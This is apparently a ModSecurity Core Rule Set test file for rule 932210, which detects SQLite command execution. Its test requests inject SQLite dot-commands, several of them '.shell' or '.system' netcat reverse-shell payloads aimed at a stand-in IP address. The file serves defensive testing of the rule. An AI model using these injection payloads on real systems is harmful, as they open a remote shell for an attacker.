---
  meta:
    author: flo405
    description: SQLite System Command Execution
    enabled: true
    name: 932210.yaml
  tests:
  -
    test_title: 932210-1
    desc: ";\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\n"
    stages:
    -
      stage:
        input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "*/*"
            Host: localhost
            User-Agent: ModSecurity CRS 3 Tests
          method: GET
          port: 80
          uri: /?foo=;\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\n
          version: HTTP/1.0
        output:
          log_contains: id "932210"
  -
    test_title: 932210-2
    desc: "%22;\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\n"
    stages:
    -
      stage:
        input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "*/*"
            Host: localhost
            User-Agent: ModSecurity CRS 3 Tests
          method: GET
          port: 80
          uri: /?foo=%22;\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\n
          version: HTTP/1.0
        output:
          log_contains: id "932210"
  -
    test_title: 932210-3
    desc: ";\n.system%20nc%2010.10.10.1%206666%20-e%20sh\n"
    stages:
    -
      stage:
        input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "*/*"
            Host: localhost
            User-Agent: ModSecurity CRS 3 Tests
          method: GET
          port: 80
          uri: /?foo=;\n.system%20nc%2010.10.10.1%206666%20-e%20sh\n
          version: HTTP/1.0
        output:
          log_contains: id "932210"
  -
    test_title: 932210-4
    desc: ";\n.databases"
    stages:
    -
      stage:
        input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "*/*"
            Host: localhost
            User-Agent: ModSecurity CRS 3 Tests
          method: GET
          port: 80
          uri: /?foo=;\n.databases
          version: HTTP/1.0
        output:
          log_contains: id "932210"
